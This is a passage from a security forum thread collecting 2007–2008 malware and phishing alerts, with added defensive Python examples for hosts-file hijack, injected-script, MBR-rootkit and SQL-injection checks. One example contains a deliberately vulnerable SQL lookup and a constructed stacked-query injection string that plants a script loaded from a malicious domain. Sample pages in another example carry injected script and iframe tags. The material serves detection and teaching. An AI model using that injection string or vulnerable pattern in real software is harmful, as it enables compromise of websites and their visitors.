Old Alerts

Malicious Code: USDoJ (SPAM) Trojan Horse

FYI...

- http://www.websense.com/securitylabs/alerts/alert.php?AlertID=822
November 19, 2007 - "Websense® Security Labs™ has discovered a new -email- attack variant similar to attacks previously launched on the IRS and Better Business Bureau. The spoofed email claims to be from the United States Department of Justice (USDOJ)... The message claims that a complaint to the USDOJ has been filed against the recipient's company. The email informs the reader that a copy of the original complaint has been attached to the email. The attached "complaint" is a Trojan Downloader .scr file with an MD5 of aeb784bc17c4c7e6edc5f1faaa9ed24f. None of the major anti-virus vendors detected the malicious code..."
(Screenshot available at the URL above.)

--------------------------------------------
More...
- http://blog.washingtonpost.com/securityfix/2007/11/a_fresh_round_of_targeted_emai.html
November 19, 2007; 10:30 PM ET - "Another series of sophisticated e-mail attacks were launched over the past 24 hours, addressing recipients by name and warning of complaints filed against them and/or their company with the Justice Department -and- the Better Business Bureau. E-mail security firm MessageLabs said it spotted the spike in targeted e-mail attacks designed to look as though they were sent from the Better Business Bureau. The messages address recipients by name and list corresponding employer information both in the body of the e-mail and the subject line. The missives reference an attached "complaint," which is actually a screensaver file that harbors password-stealing software..."

:fear:
 
Hackers jack Monster.com - infect job hunters

FYI...

- http://preview.tinyurl.com/39mtqc
November 20, 2007 (Computerworld) - "Monster.com took a portion of its Web site offline Monday as researchers reported that it had been compromised by an IFRAME attack and was being used to infect visitors with a multi-exploit attack kit. According to Internet records, the Russian Business Network (RBN) hacker network may be involved. Parts of the Monster Company Boulevard, which lets job hunters search for positions by company, were unavailable Monday; by evening, the entire section was dark. Most major American companies are represented on the site -- Google Inc.'s cache of the page that shows only those firms which begin with the letter "B", for example, included Banana Republic, Bank of America, Black & Decker, Boeing, Broadcom and Budget Car Rental. Job seekers who used Monster's by-company directory on Monday before the site was yanked were pounced on by Neosploit, an attack toolkit similar to the better-known Mpack, said Roger Thompson*, chief technology officer at Exploit Prevention Labs Inc... The injection of the malicious IFRAME code into the Monster.com site probably happened Monday, he added... "It is not clear how many pages were affected, but it is likely that the attack was the same for all companies on the site, which might turn out to be a pretty good set of the Fortune 500"... Monster.com last made security news in August, when the company admitted hackers had looted its database for weeks, perhaps months, then used that information to craft and send targeted e-mails that pitched money laundering jobs or tried to trick recipients into downloading malware. Monster.com was not available for comment Monday night."
* http://explabs.blogspot.com/2007/11/big-hack-today.html

:fear:
 
Malicious Code: Humanitarian support for flood victims email

FYI...

Malicious Code: Tabasco state/Banamex email lure banker trojan
- http://www.websense.com/securitylabs/alerts/alert.php?AlertID=824
November 20, 2007 - "Websense® Security Labs™ has discovered -emails- that claim to solicit humanitarian support for flood victims in the state of Tabasco, Mexico. If users click an embedded link, they are prompted to download a banker Trojan horse, disguised as an HTML file. The file is displayed with the blue Internet Explorer icon. When a user opens the file, the Trojan horse modifies the hosts file to replace the legitimate Banamex with the IP address of a host controlled by the attacker. If users attempt to go to the Banamex site, they receive no visual indicators that they are not at a legitimate site. The phishing toolbars that were tested did not detect this fake site as a fraud. Neither the downloaded banker Trojan horse nor the subsequent executable that it drops (win32.exe) are detected as malicious by the 32 anti-virus products tested..."

(Screenshots available at the URL above.)

:fear:
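Added example (my own, not from the Websense alert): the Trojan above works by editing the hosts file so that banamex.com resolves to an attacker host, and the browser shows nothing unusual because the OS itself handed over the wrong address. The check below parses a Windows or Unix hosts file and flags any watched domain that is pinned to an address which is neither loopback nor 0.0.0.0 (those two are blocks, which ad-blocking hosts files use legitimately; anything else for a bank domain is a redirect). The sample hosts text, the 192.0.2.10 attacker address and the watch list are constructed for the example.

```python
"""Hosts-file hijack check (added example, not from the alert it follows).

Parse a hosts file and report watched domains that resolve to an address
other than loopback/unspecified, which is the redirect the Banamex banker
Trojan installs.  Sample text and watch list are constructed.
"""
import ipaddress
import os
import sys

# Constructed sample: the usual loopback lines plus one hijacked bank domain.
# 192.0.2.10 is documentation address space standing in for the attacker host.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2006 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
192.0.2.10      www.banamex.com banamex.com
0.0.0.0         ads.example.net
"""

# Constructed watch list; in practice, every domain the organisation banks or pays with.
WATCHED_DOMAINS = {"banamex.com", "paypal.com", "ebay.com"}


def parse_hosts(text):
    """Return (line_number, ip_address, hostname) for every name on every valid line."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()       # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                               # malformed address: not a mapping
        for name in fields[1:]:
            entries.append((lineno, ip, name.lower().rstrip(".")))
    return entries


def is_watched(hostname):
    """True for a watched domain or any subdomain of one."""
    return any(hostname == d or hostname.endswith("." + d) for d in WATCHED_DOMAINS)


def suspicious_entries(text):
    """(line_number, ip, hostname) for watched names mapped to a real address.

    Loopback and 0.0.0.0 entries are blocks, not redirects, so they pass."""
    hits = []
    for lineno, ip, name in parse_hosts(text):
        if is_watched(name) and not (ip.is_loopback or ip.is_unspecified):
            hits.append((lineno, str(ip), name))
    return hits


if __name__ == "__main__":
    # With --live, read the machine's own hosts file; otherwise use the sample.
    if len(sys.argv) > 1 and sys.argv[1] == "--live":
        if sys.platform == "win32":
            path = os.path.join(os.environ.get("SystemRoot", r"C:\Windows"),
                                "System32", "drivers", "etc", "hosts")
        else:
            path = "/etc/hosts"
        with open(path, encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    else:
        text = SAMPLE_HOSTS
    for lineno, ip, name in suspicious_entries(text):
        print(f"line {lineno}: {name} -> {ip}")
```

Run it with `--live` on a box you suspect; an empty result only says the hosts file is clean, so the same domains still deserve a look at the resolver the machine is actually using.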
 
Attention (online) Shoppers...

FYI...

- http://preview.tinyurl.com/39qspa
November 26, 2007 (Computerworld) - "...Safe-shopping tips. Here are a dozen to get you started:
* Shop with online merchants you know and trust.
* Order from secure Web sites, which can be identified by a locked padlock or unbroken key icon in your Web browser (unsecured sites may show an unlocked padlock or a broken key).
* Keep printouts of everything, including copies of your order; Web pages describing what you ordered; Web pages that tell the seller’s name, address and telephone number; and any e-mail confirmations you get. And make sure you add the date if it doesn’t automatically appear on the printouts.
* Use credit cards for online purchases, which will limit your loss to $50 if your credit is used without authorization. But it has to be a real credit card, not a debit or check card. You may want to use just one credit card for all online payments, to make it easier to detect wrongful charges.
* Don’t give out your Social Security number.
* Don’t give out unnecessary information.
* Don’t send your credit card number by e-mail.
* Don’t give out your passwords for e-commerce Web sites to anyone.
* Don’t give out your bank information; no one needs it for an online order.
* Double-check every Web site address.
* Don’t click on links within e-mails. Type in the Web site’s address yourself -- very carefully.
* Remember, if the deal seems too good to be true, it probably is.

You can also direct users to online sources of additional information, including the Better Business Bureau Web site ( www.bbbonline.org/OnlineShopTips ), the Privacy Rights Clearinghouse ( www.privacyrights.org/fs/fs23-shopping.htm ) and the Federal Trade Commission Web site ( www.ftc.gov/onlineshopping )..."

:spider:
 
Spammers shift to spreading malware

FYI...

The 2008 Internet Security Trends Report from IronPort Systems estimates that 98 per cent of all email traffic is now spam.
- http://www.ironport.com/securitytrends/
Dec 04, 2007 - "Spam volume increased 100 percent, to more than 120 billion spam messages daily worldwide. That's about 20 spam messages per day for every man, woman and child on the planet.
TRENDS OVERVIEW
The overall trends in spam and malware can be characterized by a larger number of more targeted, stealthy and sophisticated attacks. Specific observations include:
> Spam has become more dangerous.
...In 2007, more than 83 percent of spam contained a URL to a rogue Web server that was frequently serving malware. In accordance with a trend towards the blending of different malware techniques, URL-based viruses increased 256 percent.
> The "Self Defending Bot Network" was introduced...
> Viruses no longer make headlines..."
(Full report and links available at the URL above.)

------------------------------------------------

F-Secure - Malware Grew by 100% during 2007
As much malware produced in 2007 as in the previous 20 years altogether
- http://www.f-secure.com/f-secure/pressroom/news/fs_news_20071204_1_eng.html
Dec 4, 2007 - "In its 2007 data security summary, F-Secure reports a steep increase in the amount of new malware detected during 2007. In fact the amount of cumulative malware detections doubled during the year, reaching the amount of half a million. This indicates that network criminals are producing new malware variants in bulk... The full 2007 Data Security Wrap-Up is available at http://www.f-secure.com/2007/2/ ... F-Secure predicts the increase in malware volume will continue in 2008. The criminals are successfully creating a network-based underground ecosystem, trading both malware development tools, skills, capabilities and resources ever more effectively. At the same time the reach of the law enforcement agencies remains limited in the global network domain..."

:sad:
 
Holiday e-card SPAM

FYI...

- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=204700531
Dec. 4, 2007 - "...Message Labs said following Thanksgiving that it was seeing holiday-themed spam coming across its infrastructure at a rate of about 300,000 an hour. Symantec security researcher Jitender Sarda documented* one such attack on Tuesday that uses e-cards. "These e-cards are purportedly sent from a legitimate source and try to lure the victim to click on the link to view the e-cards, which have underlying tricks to try and infect the computer," said Sarda in a blog post. "With the Xmas bells starting to ring, here is the first incidence where Xmas e-cards have started doing the rounds." While these e-cards may appear to come from a familiar brand name, the "From:" field is forged. And the spammer responsible, perhaps aware that e-cards have acquired an air of disrepute, has even gone so far as to include the phrase "(no worm, no virus)" in the e-card's text, as if such an assurance made the message safe. In fact, the link provided attempts to download a file named "sos385.tmp" which is itself a downloader that connects to the Internet and attempts to download other malicious files."
* http://preview.tinyurl.com/2u5z7n
(Symantec Security Response Weblog)
---------------------------------------

More Christmas Card Action
- http://www.f-secure.com/weblog/archives/00001330.html
December 5, 2007 - "We've just seen another fake Christmas card malware run... The links are masked and point to a fake Yahoo Greeting card site. Do note the fake URL (abuse messages have been sent about the site)... The site prompts the user to download malicious macromedia-flashplayerupdate.exe (md5: 506744BF870B5B0E410087BD6F3EFD37). We detect this file as an Agent variant. It collects various types of information from the infected machine and sends it back to the malware author via a website."

(Screenshots available at the F-secure URL above.)

:fear:
 
Malicious Code: Dept of Treasury Trojan Horse

FYI...

- http://www.websense.com/securitylabs/alerts/alert.php?AlertID=830
December 13, 2007 - "Websense® Security Labs™ has discovered a new -email- attack that uses a spoofed email claiming to be from the United States Department of Treasury. This is similar to previous attacks claiming to originate from the IRS, Better Business Bureau, and Department of Justice. We have been tracking all of these attacks, and reporting them as they are discovered. The message claims that a complaint to the Department of Treasury has been filed against the recipient's company. The email informs the reader that a copy of the original complaint has been attached to the email. The attached "complaint" is a Trojan downloader with some backdoor capabilities. It is a ".pif" file with an MD5 of 9e19d23f27ebf9cfe1b9103066a3019e. It appears, however, that different versions of the Trojan are sent, based on the targeted recipient or company..."

(Screenshot available at the URL above.)

:fear:
 
HP Info Center Software laptop vuln - update available

FYI...

- http://www.us-cert.gov/current/#hp_hp_info_center_software
updated December 14, 2007 - "US-CERT is aware of a vulnerability affecting HP Info Center Software, which allows one-touch access to features on HP laptops. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary commands or to view or alter the system registry on affected systems. These reports also refer to publicly available exploit code for this vulnerability. HP has published an HP Quick Launch Buttons Critical Security Update* to address this issue. US-CERT encourages users to apply this update to mitigate this risk.
* ftp://ftp.hp.com/pub/softpaq/sp38001-38500/sp38166.html

- http://preview.tinyurl.com/2jhrxc
(HP Customer Care)
Release Date: 2007-12-12
Version: 1.00 A
Description:
This package provides a critical security update for HP Quick Launch Buttons on the supported notebook models and operating systems. This patch removes a security vulnerability by disabling HP Info Center...
» sp38166.exe 1/1 (1.61M)

:fear:
 
Rootkit infections up at Prevx test site

FYI...

- http://www.itbusiness.ca/it/client/en/home/news.asp?id=46368
12/14/2007 - "...Since 1 December 2007, 114,891 new users have run Prevx CSI with rootkit-detection features enabled. Of those PCs, 1,678 had what Prevx describes as 'significant rootkit infections'. That equates to 1.46% or approximately one in 70 systems, which is almost 15 times higher than the one in 1,000 rootkit-infected PCs previously estimated by industry experts. In the first nine days of this month alone, 93 companies used the free Business scan feature of Prevx CSI. Of these companies, 68 had one or more infected PCs. Thirteen companies, or 14%, had one or more PCs harboring rootkit infections.
These stats don't take into account the fact that users who scan their PCs are more likely to have concerns about infections..."

> http://info.prevx.com/downloadcsi.asp
"822,006 people have already checked their PC with Prevx CSI free, 182,018 were infected..."

:fear:
 
$3 Billion lost to phishing

FYI...

- http://www.gartner.com/it/page.jsp?id=565125
December 17, 2007 - "Phishing attacks in the United States soared in 2007 as $3.2 billion was lost to these attacks, according to a survey by Gartner, Inc. The survey found that 3.6 million adults lost money in phishing attacks in the 12 months ending in August 2007, as compared with the 2.3 million who did so the year before. According to a survey of more than 4,500 online U.S. adults in August 2007 (which was representative of the online U.S. adult population) the attacks were more successful in 2007 than they were in the previous two years. Of consumers who received phishing e-mails in 2007, 3.3 percent say they lost money because of the attack, compared with 2.3 percent who lost money in 2006, and 2.9 percent who did so in 2005...
The average dollar loss per incident declined to $886 from $1,244 lost on average in 2006 (with a median loss of $200 in 2007), but because there were more victims, $3.2 billion was lost to phishing in 2007, according to surveyed consumers. There was a bit of relative good news, however; the amounts that consumers were able to recover also increased. Some 1.6 million adults recovered about 64 percent of their losses in 2007, up from the 54 percent that 1.5 million adults recovered in 2006.
PayPal and eBay continue to be the most-spoofed brands, but phishing attacks increasingly employ devious social engineering attacks, impersonating, for example, electronic greeting cards, charities and foreign businesses.
Thieves are increasingly stealing debit card and other bank account credentials to rob accounts — targeting areas where fraud detection is weaker than it is with credit card accounts. According to the survey, of those consumers who lost money to phishing attacks, 47 percent said a debit or check card had been the payment method used when they lost money or had unauthorized charges made on their accounts. This was followed by 32 percent of respondents who listed a credit card as the payment method, and 24 percent who listed a bank account as the method (multiple responses were allowed)...
Phishing and malware attacks will continue to increase through 2009 because it's still a lucrative business for the perpetrators, and advertising networks will be used to deliver up to 30 percent of malware that lands on consumer desktops.
Gartner sees no easy way out of this dilemma unless e-mail providers have incentives to invest in solutions to keep phishing e-mails from reaching consumers in the first place, and unless advertising networks and other "infection point" providers (which theoretically can be any legitimate Web site or service) have incentives to keep malware from being planted on their Web sites to reach unsuspecting consumers..."

:fear::spider:
 
FYI...

McAfee false positive on some JavaScripts
- http://isc.sans.org/diary.html?storyid=3803
Last Updated: 2008-01-02 21:36:16 UTC - "Some users reported that their AV was detecting JS/Exploit-BO virus, on sites like ESPN and Friendster, for instance. The problem is with the McAfee AV. McAfee just released an Emergency DAT to fix the false on some JavaScripts, detecting as JS/Exploit-BO on virus database (DAT file) 5197 released today. The new DAT just released is 5198 and the url to download it is: http://www.mcafee.com/apps/downloads/security_updates/dat.asp "

(In the wake of "CA false positive for certain Javascript apps":
http://isc.sans.org/diary.html?storyid=3797 Last Updated: 2007-12-31 23:07:19 UTC)

:oops:
 
Facebook whacked...

FYI...

Phish (Face)book!
- http://www.f-secure.com/weblog/archives/00001353.html
January 3, 2008 - " We recently came across a phishing attack targeting Facebook. Phishers are apparently using hacked Facebook accounts to post links to a fake login page on other people's "Wall posts"... The phishing site is still currently online. Be wary of clicking on those links out there, even if they seem to (genuinely) come from your friends! Hat tip to Techcrunch*."
* http://www.techcrunch.com/2008/01/02/phishing-for-facebook

(Screenshots available at both URLs above.)
---------------------------------------------------
More... Zango adware on Facebook

- http://www.vnunet.com/vnunet/news/2206462/facebook-hit-adware-attack
3 Jan 2008 - "Facebook users are being warned about a new application on the social networking site that contains adware. 'Secret Crush' contains a download of the Zango adware program which automatically sends itself to five friends. It has already infected three per cent of Facebook users, over one million computers, according to security firm Fortinet*..."

Facebook Widget Installing Spyware
* http://www.fortiguardcenter.com/advisory/FGA-2007-16.html
2008.January.02

:fear::spider:
 
Last edited:
Malicious ads on Myspace, Excite, Blick

FYI...

- http://sunbeltblog.blogspot.com/2008/01/malicious-ads-on-myspace-excite-blick.html
January 03, 2008 - "We worked earlier today with Brian Krebs at the WP* about malicious banner ads on Myspace. (Malware is being delivered through exploits, but fully patched systems won’t be affected.) Sandi Hardmeier has also been tracking ads at Excite and, now, Blick** (a popular German site). These are different than the Myspace ads (in that they don’t seem to be dumping an exploit-driven payload)."

* http://blog.washingtonpost.com/securityfix/2008/01/malwarelaced_banner_ads_at_mys.html

** http://msmvps.com/blogs/spywaresucks/archive/2008/01/04/1435836.aspx

:fear:
 
RealPlayer v11 0-day exploit released

FYI...

- http://www.us-cert.gov/current/#public_exploit_code_for_realplayer
January 2, 2008

- http://secunia.com/advisories/28276/
Release Date: 2008-01-03
Critical: Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched
Software: RealPlayer 11.x
...Successful exploitation allows execution of arbitrary code. The vulnerability is reported in version 11 build 6.0.14.748. Other versions may also be affected.
Solution:
Do not open untrusted media files or browse untrusted websites...

- http://isc.sans.org/diary.html?storyid=3810
Last Updated: 2008-01-05 00:34:02 UTC ...(Version: 4)
"> Update 15:10 UTC: While you're at it, consider blocking access to uc8010-dot-com. If you do a Google Search for this domain, you'll understand why: Lots of injecting of a malicious 0.js from this domain is currently going on, plenty of web sites seem to contain this booby trap. One of the IFRAMES fetched from this site, the file "r.htm" contains a RealPlayer exploit. Still the one from last month ( www.kb.cert.org/vuls/id/871673 ) but if they happen to re-tool to the new vulnerability, things might get ugly.
> Update 16:30 UTC: One of our readers noted that there are a number of state government and educational sites that appear to have been compromised with the uc8010 domain. Upon review, I see that some of these have already been cleaned up. However, the .gov and .edu sites are only a few of the many many sites that are turned up via google searches for the uc8010 domain. As that domain was only registered as of Dec 28th, compromises of websites probably occurred in the past week.
I recommend that our readers check to see if their site shows any references to uc8010 via google. Alternatively, look on their webservers to see if there are any unauthorized change to webpages in the past week.
> Update 00:30 UTC 5 JAN 08: Looks like there is another domain hosting a similar script. In addition to uc8010 check your flows for "ucmal.com"
----------------------------------------------------------

CA web site hacked
http://preview.tinyurl.com/2wdxkw
January 04, 2008 (Computerworld) - "Part of security software vendor CA's Web site was cracked earlier this week and was redirecting visitors to a malicious Web site hosted in China. Although the problem now appears to have been corrected, cached versions of some pages in the press section of CA.com show that earlier this week the site had been redirecting visitors to the uc8010.com domain, which has been serving malicious software since late December, according to Marcus Sachs, director of the SANS Internet Storm Center. The hack is similar to last year's attack on the Dolphin Stadium Web site, which infected visitors looking for information on the Super Bowl football game, Sachs said. "It's exactly the same setup," he said. "It's JavaScript that they've managed to insert into the title or the body of the HTML"..."

:fear:
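Added example (mine, not from the ISC diary or the Computerworld story): the diary's advice is to Google your own domain for uc8010 or, better, look on the web servers for pages changed in the past week. The scanner below does the second thing: walk a web root, take only files modified inside a time window, and report every `<script src>` or `<iframe src>` whose host is on a watch list, using the two domains the diary names. The sample tree, its page contents and the 30-day-old timestamp on one file are constructed so it runs offline.

```python
"""Web-root scan for injected script/iframe references (added example).

Walk a web root, pick files modified within the last `days` days, and report
<script>/<iframe> tags that load from a watched host.  Sample tree and its
timestamps are constructed for the example.
"""
import os
import re
import tempfile
import time

# The two domains the ISC diary names; extend with whatever your IDS flags.
WATCHED_HOSTS = {"uc8010.com", "ucmal.com"}
PAGE_SUFFIXES = (".htm", ".html", ".php", ".asp", ".aspx", ".js")

# <script ... src=URL> or <iframe ... src=URL> with an absolute or
# protocol-relative URL; captures the tag name and the host part.
SRC_RE = re.compile(
    r"<\s*(script|iframe)\b[^>]*?\bsrc\s*=\s*['\"]?\s*(?:https?:)?//([^/'\"\s>]+)",
    re.IGNORECASE,
)


def host_is_watched(host):
    host = host.lower().split(":")[0]             # drop any :port
    return any(host == w or host.endswith("." + w) for w in WATCHED_HOSTS)


def external_sources(html):
    """All (tag, host) pairs that pull content from another host."""
    return [(tag.lower(), host) for tag, host in SRC_RE.findall(html)]


def watched_hits(html):
    return [(tag, host) for tag, host in external_sources(html) if host_is_watched(host)]


def scan_webroot(root, days=7, now=None):
    """Sorted (relative_path, tag, host) for watched references in recently modified pages."""
    now = time.time() if now is None else now
    cutoff = now - days * 86400
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PAGE_SUFFIXES):
                continue
            path = os.path.join(dirpath, name)
            if os.path.getmtime(path) < cutoff:
                continue                           # untouched in the window
            with open(path, encoding="utf-8", errors="replace") as fh:
                for tag, host in watched_hits(fh.read()):
                    rel = os.path.relpath(path, root).replace(os.sep, "/")
                    findings.append((rel, tag, host))
    return sorted(findings)


def build_sample_webroot():
    """Constructed tree: a clean page, a freshly injected page, and an injected
    page whose mtime is pushed 30 days back so a one-week window skips it."""
    root = tempfile.mkdtemp(prefix="webroot-")
    pages = {
        "index.html": '<html><script src="/js/site.js"></script>'
                      '<script src="https://cdn.example.net/lib.js"></script></html>',
        "press/release.htm": "<html><body>News</body>"
                             "<script src=http://uc8010.com/0.js></script></html>",
        "news/old.htm": '<html><iframe src="http://www.ucmal.com/r.htm" width=0 height=0>'
                        "</iframe></html>",
    }
    for rel, body in pages.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    old = time.time() - 30 * 86400
    os.utime(os.path.join(root, "news", "old.htm"), (old, old))
    return root


if __name__ == "__main__":
    root = build_sample_webroot()
    for rel, tag, host in scan_webroot(root, days=7):
        print(f"{rel}: <{tag}> loads from {host}")
```

Point it at the real document root and widen `days` if the site was not checked last week. Note the caveat from the SQL-injection variant of the same campaign: when the script tag lives in database rows rather than files, the files on disk never change, so a file-mtime scan like this one will miss it and the database has to be searched instead.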
 
Last edited:
Security vuln in Vista/XP - rootkit exploit in the wild

FYI...

- http://preview.tinyurl.com/2lgp5u
January 05, 2008 (Donna's SecurityFlash) - "In early December 2007 a new rootkit that hides itself in the Master Boot Record (MBR) of a user's disk was spotted in the wild. Up until then this was more of a proof of concept (POC). This goes to show how much effort rootkit authors are putting in to creating new ways of evading Anti Rootkit software. This is a new vector of attack for malware writers and gives them control from outside the Operating System. This rootkit is using the MBR flaw. The MBR can be written to from within Windows.
The rootkit installs itself ( 244K ) on the last sectors of the user's disk and then modifies other sectors including sector 0. The code is run before your PC boots up into XP, Vista or NT and has full control of the boot process which means it can install and run any application it wants without you, XP, Vista or NT knowing about it."

> http://www.antirootkit.com/blog/200...-in-vista-and-xp-rootkit-exploit-in-the-wild/

> http://www2.gmer.net/mbr/

:fear::spider:
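Added example (mine, not from the post above or from the gmer tool it links): because the rootkit rewrites sector 0 so that its code runs before the OS, the practical check is to read sector 0 and compare it with a copy taken while the disk was known clean. The code below parses a 512-byte MBR (0x55AA signature, the four partition entries, the disk signature) and hashes the 440 bootstrap bytes separately from the partition table, so a patched bootstrap shows up as a changed hash even when the partitions still look normal. The sector bytes are constructed; on a real machine the same 512 bytes come from a raw read of `\\.\PhysicalDrive0` on Windows or `/dev/sda` on Linux, which needs administrator/root access.

```python
"""MBR parse and bootstrap-code fingerprint (added example).

Parse one 512-byte master boot record, validate it, and hash the bootstrap
code so sector 0 can be compared against a known-clean baseline.  The sector
contents are constructed for the example.
"""
import hashlib
import struct

SECTOR_SIZE = 512
BOOT_SIGNATURE = b"\x55\xaa"
PARTITION_TABLE_OFFSET = 446
# status, CHS start (3 bytes), type, CHS end (3 bytes), LBA start, sector count
ENTRY_FORMAT = "<B3sB3sII"


def build_sample_mbr(bootstrap=b"\x33\xc0\x8e\xd0\xbc\x00\x7c"):
    """Constructed MBR: a few bootstrap bytes padded to 440, a disk signature,
    one bootable NTFS partition at LBA 2048, three empty entries, 0x55AA."""
    code = bootstrap.ljust(440, b"\x00")
    disk_signature = struct.pack("<I", 0x1234ABCD) + b"\x00\x00"
    ntfs = struct.pack(ENTRY_FORMAT, 0x80, b"\x01\x01\x00", 0x07, b"\xfe\xff\xff", 2048, 1_000_000)
    empty = b"\x00" * 16
    sector = code + disk_signature + ntfs + empty * 3 + BOOT_SIGNATURE
    assert len(sector) == SECTOR_SIZE
    return sector


def parse_mbr(sector):
    """Return disk signature, in-use partition entries and a hash of the bootstrap code."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("expected exactly one 512-byte sector")
    if sector[510:512] != BOOT_SIGNATURE:
        raise ValueError("0x55AA boot signature missing")
    partitions = []
    for index in range(4):
        offset = PARTITION_TABLE_OFFSET + 16 * index
        status, _chs_start, ptype, _chs_end, lba, count = struct.unpack(
            ENTRY_FORMAT, sector[offset:offset + 16])
        if ptype == 0:
            continue                                  # unused entry
        partitions.append({"index": index, "bootable": status == 0x80,
                           "type": ptype, "lba_start": lba, "sectors": count})
    return {
        "disk_signature": struct.unpack("<I", sector[440:444])[0],
        "partitions": partitions,
        "bootcode_sha256": hashlib.sha256(sector[:440]).hexdigest(),
    }


def compare_with_baseline(sector, baseline):
    """`baseline` is the dict parse_mbr() returned for the known-clean sector."""
    current = parse_mbr(sector)
    return {
        "bootcode_changed": current["bootcode_sha256"] != baseline["bootcode_sha256"],
        "partitions_changed": current["partitions"] != baseline["partitions"],
        "disk_signature_changed": current["disk_signature"] != baseline["disk_signature"],
    }


if __name__ == "__main__":
    clean = parse_mbr(build_sample_mbr())
    # Same partition table, different bootstrap bytes: what a patched sector 0 looks like.
    patched = build_sample_mbr(bootstrap=b"\xeb\xfe")
    print(compare_with_baseline(patched, clean))
```

Store the baseline dict (or just the bootstrap hash) somewhere off the machine; a rootkit that can write sector 0 can also rewrite a baseline file kept on the same disk. Reading sector 0 through the running OS can also be lied to by a rootkit that filters disk reads, which is why tools like the gmer one linked above do their own checks and why a read from a boot CD is the more trustworthy sample.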
 
Mass hack on 70k sites (!?)

FYI...

- http://preview.tinyurl.com/27hohx
January 07, 2008 (Computerworld) -- Tens of thousands of Web sites have been compromised by an automated SQL injection attack, and although some have been cleaned, others continue to serve visitors a malicious script that tries to hijack their PCs using multiple exploits, security experts said this weekend. Roger Thompson, the chief research officer of Grisoft SRO, pointed out that the hacked sites could be found via a simple Google search for the domain that hosted the malicious JavaScript. On Saturday, said Thompson, the number of sites that had fallen victim to the attack numbered more than 70,000. "This was a pretty good mass-hack," said Thompson, in a post to his blog*. "It wasn't just that they got into a server farm, as the victims were quite diverse, with presumably the only common point being whatever vulnerability they all shared." Symantec Corp. cited reports by other researchers - including one identified only as "websmithrob" - that fingered an SQL vulnerability as the common thread..."
* http://explabs.blogspot.com/2008/01/so-this-is-kind-of-interesting.html
January 05, 2008 - "This domain uc8010(dot)com was registered just a few days ago (Dec 28th), and yet, at one point Google showed script injections pointing to it were showing up on over 70k domains... If you google for uc8010(dot)com, you still get about 50k hits..."

- http://isc.sans.org/diary.html?storyid=3810
Last Updated: 2008-01-05 20:13:55 UTC ...(Version: 5) - "Update 17:52: We have gotten reports of embedded script links to ucmal on MySpace. It is probably safe to assume that other social networking sites have it as well."

:fear::fear::devilpoin:
 
SQL injection attack...

More...

- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=205600157
Jan. 8, 2008 - "Web sites that naively call for user input, then fail to put strict checks on what that input may be, are susceptible to SQL injection attacks. That vulnerability appears to be the cause of up to 70,000 Web pages getting hacked by malicious code between Dec. 28 and Jan. 5. The intrusions represent a whole new level of threat to users on the Internet. Instead of the attack seeking to launch a virus or worm at individual computers, it invaded Web databases and used them to host its malicious code and distribute it every time site visitors sought information beyond a home page or product page from the database. But for the fact it used an old and already guarded against Windows exploit, it might still be spreading across the Internet... it was Microsoft SQL Server databases that ended up as the target of the attack because the tables targeted are specific to SQL Server... The intrusion of each database is massive, with a JavaScript string being attached to all text items in the database. A site user's request for an information item then leads to the attacker's JavaScript response attempting to plant code on the user's computer. The attack typically invades a site with a catalogue or other large text files stored on a SQL Server database. As a site visitor clicks on a Web site's button or link for more information, such as "more information" from a catalogue, the database is activated to send a JavaScript plant onto the user's computer... The plants take advantage of a widely publicized Windows vulnerability, listed as the MS06-014* exploit... Google and Yahoo's cached pages from Web site databases may still contain the JavaScript, untouched by site efforts to clean it up, the experts warned."
* http://support.microsoft.com/kb/911562/en-us
Last Review: March 27, 2007
Revision: 3.6

:fear:
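Added example (mine, not from the InformationWeek article): the article's two points are that sites which splice user input into SQL are open to this, and that the payload appended a JavaScript string to every text item in the database. The code below shows a catalogue lookup written the vulnerable way next to the parameterized fix, plus a scan that finds rows already carrying a `<script>` reference to one of the watched domains. Python's sqlite3 refuses to run two statements in one `execute()` call, so the vulnerable path splits the batch and runs each statement in turn to stand in for a server that executes every statement it is handed, as the targeted SQL Server installations did. The table, its rows and the attack string are constructed for the example.

```python
"""SQL injection: vulnerable lookup, parameterized fix, scan for injected rows.

Added example, not code from the article.  Catalogue rows, watched domains and
the attack string are constructed; the batch split emulates a server that
runs stacked statements.
"""
import re
import sqlite3

# Constructed catalogue.
SAMPLE_ROWS = [
    (1, "Widget", "A reliable widget."),
    (2, "Gadget", "A gadget for every occasion."),
    (3, "Gizmo", "Gizmo with extra features."),
]

# The two domains the ISC diary told readers to look for.
WATCHED_HOSTS = ("uc8010.com", "ucmal.com")
SCRIPT_SRC_RE = re.compile(r"<script[^>]*\bsrc\s*=\s*['\"]?(?:https?:)?//([^/'\"\s>]+)", re.I)

# Constructed attack input in the shape the article describes: a second
# statement that appends a script tag to every description in the table.
ATTACK_INPUT = ("1; UPDATE products SET description = description || "
                "'<script src=http://uc8010.com/0.js></script>'")


def new_catalogue():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def lookup_vulnerable(conn, product_id):
    """BAD: product_id is pasted into the SQL text, so anything after a ';'
    becomes a second statement the server will happily run."""
    sql = f"SELECT description FROM products WHERE id = {product_id}"
    rows = []
    # Batch emulation: sqlite3.execute() takes one statement per call.
    for statement in (s.strip() for s in sql.split(";")):
        if statement:
            rows.extend(conn.execute(statement).fetchall())
    conn.commit()
    return [r[0] for r in rows]


def lookup_safe(conn, product_id):
    """GOOD: check the type first, then bind the value as a parameter so the
    driver never interprets it as SQL."""
    try:
        pid = int(product_id)
    except (TypeError, ValueError):
        raise ValueError("product id must be an integer") from None
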